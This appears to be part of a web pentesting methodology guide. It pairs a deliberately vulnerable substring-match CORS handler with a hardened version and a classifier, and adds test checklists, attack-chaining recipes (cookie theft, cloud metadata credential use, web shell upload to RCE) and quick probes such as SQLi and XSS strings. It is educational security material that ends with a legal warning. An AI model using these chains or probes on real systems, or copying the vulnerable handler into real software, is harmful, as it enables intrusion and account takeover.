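The first three CORS items above are decisions an origin check gets wrong in the same place. Added example, not code from this repository: the substring-match handler that produces all three findings, the exact-match allowlist that does not, and a small classifier that turns a probe's request Origin and the response headers into the finding name a tester or a log review would record. `ALLOWED_ORIGINS` and `OUR_DOMAIN` are constructed.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://app.example.test", "https://admin.example.test"}  # constructed allowlist
OUR_DOMAIN = "example.test"  # constructed


def vulnerable_cors(origin: Optional[str]) -> Dict[str, str]:
    """Common shape: "does the Origin mention our domain?" then reflect it with
    credentials. Accepts https://example.test.attacker.test (suffix trick),
    https://evil.example.test (any subdomain) and the literal null origin."""
    if origin is None:
        return {}
    if origin == "null" or OUR_DOMAIN in origin:
        return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}
    return {}


def hardened_cors(origin: Optional[str]) -> Dict[str, str]:
    """Exact-match allowlist. null is never allowed (sandboxed iframes and
    file:// pages send it). Vary: Origin stops a shared cache from serving one
    origin's ACAO to another."""
    if not origin or origin == "null":
        return {}
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.netloc or parts.path or parts.query or parts.fragment:
        return {}
    if origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def classify(origin_sent: str, headers: Dict[str, str]) -> str:
    """Name the finding from the Origin a probe sent and the headers that came back."""
    acao = headers.get("Access-Control-Allow-Origin")
    creds = headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
    suffix = " with credentials" if creds else ""
    if acao is None:
        return "no CORS"
    if acao == "*":
        return "wildcard with credentials (browsers reject this pairing)" if creds else "wildcard, no credentials"
    if acao == "null" and origin_sent == "null":
        return "null origin allowed" + suffix
    if acao == origin_sent and origin_sent not in ALLOWED_ORIGINS:
        return "origin reflected" + suffix
    return "allowlisted origin"
```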
```text
┌─────────────────────────────────────────────────────────────┐
│ FRAMES / IFRAMES → TEST FOR...                              │
└─────────────────────────────────────────────────────────────┘
🟡 CLICKJACKING
├── Test: Frame sensitive page, overlay transparent button
└── 📖 Clickjacking.md

🟡 TABNABBING
├── Test: Open link with target="_blank", change opener URL
└── 📖 Tabnabbing.md

🟢 POSTMESSAGE MISCONFIGURATION
├── Test: Wildcard targetOrigin, missing origin check
└── 📖 xss.md (DOM-based XSS via postMessage)
```
```text
┌─────────────────────────────────────────────────────────────┐
│ CSP HEADER → TEST FOR...                                    │
└─────────────────────────────────────────────────────────────┘
🟡 CSP BYPASS VIA CDN WHITELIST
├── Test: Whitelisted CDN has JSONP endpoints?
└── 📖 csp.md

🟡 CSP BYPASS VIA SCRIPT GADGETS
├── Test: Legitimate scripts that can execute arbitrary JS
└── 📖 csp.md

🟡 UNSAFE-INLINE / UNSAFE-EVAL
├── Test: Inline script execution, eval() abuse
└── 📖 csp.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ JAVASCRIPT-HEAVY APP → TEST FOR...                          │
└─────────────────────────────────────────────────────────────┘
🟡 DOM-BASED XSS
├── Test: Sources (location.*, document.URL) → sinks
└── 📖 xss.md

🟡 PROTOTYPE POLLUTION
├── Test: __proto__ payloads in object merge operations
└── 📖 Prototype Pollution.md

🟡 CLIENT-SIDE DESERIALIZATION
├── Test: Malicious serialized objects in localStorage
└── 📖 Deserialization.md

🟢 EXPOSED API KEYS IN JS
├── Test: Search .js files for apiKey, token, secret
└── 📖 GitHub Security.md (similar techniques)
```
The highest-impact bugs come from chaining multiple vulnerabilities together.
```text
┌─────────────────────────────────────────────────────────────┐
│               VULNERABILITY CHAINING RECIPES                │
└─────────────────────────────────────────────────────────────┘

RECIPE 1: XSS → Account Takeover
─────────────────────────────────────────────────────────────
Open Redirect + XSS = Full Account Compromise
  Step 1: Find open redirect (Open Redirect.md)
  Step 2: Use redirect to bypass XSS input filters
  Step 3: Steal session cookies, OAuth tokens

RECIPE 2: SSRF → Internal Network Access
─────────────────────────────────────────────────────────────
SSRF + Weak Internal Auth = Data Exfiltration
  Step 1: Find SSRF endpoint (SSRF.md)
  Step 2: Access cloud metadata (169.254.169.254)
  Step 3: Use IAM credentials for lateral movement

RECIPE 3: File Upload + LFI → RCE
─────────────────────────────────────────────────────────────
Unrestricted Upload + Path Traversal = Remote Code Execution
  Step 1: Upload web shell as image (File Upload Vulns.md)
  Step 2: Find path (check response, predictable locations)
  Step 3: Include via LFI vulnerability (LFI and RFI.md)

RECIPE 4: CSRF + IDOR → Privilege Escalation
─────────────────────────────────────────────────────────────
CSRF (state change) + IDOR (user's data) = Takeover
  Step 1: Find IDOR in profile update (IDOR.md)
  Step 2: Create CSRF PoC that targets the IDOR endpoint
  Step 3: Victim unknowingly updates their own data

RECIPE 5: CRLF + XSS → Cookie Theft
─────────────────────────────────────────────────────────────
CRLF Injection + Reflected XSS = Session Hijacking
  Step 1: Inject CRLF to set new cookie (CRLF Injection.md)
  Step 2: Chain with XSS to exfiltrate original cookie
  Step 3: Use stolen cookie for session hijacking

RECIPE 6: Deserialization + SSRF → RCE
─────────────────────────────────────────────────────────────
Unsafe Deserialization + Internal Service Access = RCE
  Step 1: Find deserialization endpoint (Deserialization.md)
  Step 2: Use gadget chain that triggers SSRF
  Step 3: Access internal RCE-vulnerable service

RECIPE 7: HTTP Smuggling + Cache Poisoning → Persistent XSS
─────────────────────────────────────────────────────────────
Request Smuggling + Web Cache = Stored XSS for all users
  Step 1: Identify desync (HTTP Request Smuggling.md)
  Step 2: Poison cache with XSS payload
  Step 3: All visitors get XSS payload from cache
```
```text
┌─────────────────────────────────────────────────────────────┐
│          YOU FOUND A SINGLE BUG. CAN YOU CHAIN IT?          │
└──────────────────────────────┬──────────────────────────────┘
                               │
                               ▼
                    ┌─────────────────────┐
                    │ What's the impact?  │
                    └──────────┬──────────┘
                               │
           ┌───────────────────┼───────────────────┐
           ▼                   ▼                   ▼
   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
   │  Low Impact   │   │    Medium     │   │    Already    │
   │  (Reflected   │   │ (Stored XSS,  │   │   Critical    │
   │   XSS, Info   │   │  CSRF, IDOR)  │   │  (RCE, SQLi)  │
   │  Disclosure)  │   │               │   │               │
   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
           │                   │                   │
           ▼                   ▼                   ▼
   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
   │ CAN YOU:      │   │ CAN YOU:      │   │ CAN YOU:      │
   │ • Redirect to │   │ • Escalate    │   │ • Pivot to    │
   │   stored XSS? │   │   privileges? │   │   internal?   │
   │ • Use in      │   │ • Chain with  │   │ • Access new  │
   │   phishing?   │   │   CSRF?       │   │   targets?    │
   │ • Pair with   │   │ • Combine     │   │ • Chain for   │
   │   open redir? │   │   with LFI?   │   │   persistence?│
   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
           │                   │                   │
           └───────────────────┼───────────────────┘
                               ▼
                    ┌─────────────────────┐
                    │ Chain identified?   │
                    │ Report as single    │
                    │ finding with chain  │
                    │ PoC                 │
                    └─────────────────────┘
```
| I See... | Test For... | Methodology File |
|---|---|---|
| Login form | SQLi, Brute Force, Session Fixation, NoSQLi | SQL Injection.md, Bruteforcing.md |
| Search bar | SQLi, XSS (reflected), SSTI, Command Injection | Multiple |
| Profile page | Stored XSS, IDOR, CSRF | xss.md, IDOR.md, CSRF.md |
| File upload | Unrestricted Upload, XXE, XSS via SVG | File Upload Vulnerabilities.md, XXE.md |
| URL parameter `?url=` | SSRF, Open Redirect, LFI | SSRF.md, Open Redirect.md, LFI and RFI.md |
| OAuth login | Redirect URI bypass, CSRF, State injection | OAuth.md |
| JWT in headers | Algorithm confusion, Signature bypass | JWT.md |
| GraphQL endpoint | Introspection, Batching, Depth attacks | GraphQL.md |
| API endpoints | IDOR, Mass assignment, Race condition | IDOR.md, API Penetration.md |
| Email functionality | Header injection, SSTI, SSRF in templates | Email Attacks.md |
| WebSocket | CSWSH, Message manipulation | WebSocket Exploitation.md |
| WAF/CDN | Bypass, Origin IP, Request Smuggling | WAF.md, HTTP Request Smuggling.md |
| Cache headers | Cache poisoning, Cache deception | Web Cache Deception.md |
| CORS headers | Origin reflection, Null origin | CORS.md |
| Iframes | Clickjacking, Tabnabbing | Clickjacking.md, Tabnabbing.md |
| CSP header | Bypass via CDN, Script gadgets | csp.md |
| `__proto__` in JS | Prototype pollution | Prototype Pollution.md |
| XML input | XXE, Billion laughs | XXE Vulnerabilities.md |
| Serialized objects | Insecure deserialization | Deserialization.md |
| Race-prone endpoint | Race condition | Exploiting Race Conditions.md |
| Desired Impact | Target These Vulnerabilities |
|---|---|
| RCE (Remote Code Execution) | File Upload, SSTI, Deserialization, Command Injection, SQLi (xp_cmdshell) |
| Data Exfiltration | SQLi (UNION), XXE, SSRF (cloud metadata), IDOR |
| Account Takeover | XSS (session theft), CSRF (password change), JWT bypass, OAuth flaws |
| Privilege Escalation | IDOR, Mass Assignment, JWT claim manipulation, Prototype Pollution |
| Internal Network Access | SSRF, DNS Rebinding |
| Denial of Service | Billion laughs (XXE), GraphQL depth attacks, Race conditions |
| Phishing Enablement | Open Redirect, Tabnabbing, Clickjacking |
| Persistent Access | Web Shell, Web Cache Poisoning, Stored XSS |
When you have limited time, prioritize these checks:
| Action | Tool/Technique | Expected Time |
|---|---|---|
| Check robots.txt, sitemap.xml | Browser | 30 seconds |
| Try default credentials | admin:admin, test:test | 1 minute |
| Check for .git/, .env, .DS_Store | Browser/curl | 2 minutes |
| Test ' OR 1=1-- on login | Manual | 2 minutes |
| Test <script>alert(1)</script> in search | Manual | 2 minutes |
| Check Access-Control-Allow-Origin: * | Burp/Debugger | 2 minutes |
| Look at JS files for API keys, endpoints | Browser DevTools | 5 minutes |
| Action | Focus |
|---|---|
| Find all parameters (query, body, headers) | Burp/Gobuster |
| Test sequential IDs for IDOR | Manual/Burp Intruder |
| Test redirect-related parameters for Open Redirect | Manual |
| Test URL parameters for SSRF | Manual |
| Add ?debug=true, ?test=true | Curiosity-driven |
| Action | Focus |
|---|---|
| Pick the most promising input and go deep | Your instinct |
| Try bypass techniques from cheatsheets | resources/cheatsheets/ |
| Chain any two findings together | Phase 7 above |
| Document everything for future reference | Your notes |
⚠️ This repository contains real exploitation techniques. Unauthorized use is a criminal offense under the CFAA, Computer Misuse Act, and equivalent laws worldwide. Use only on systems you own or have explicit written permission to test.
© 2026 aw-junaid · MIT License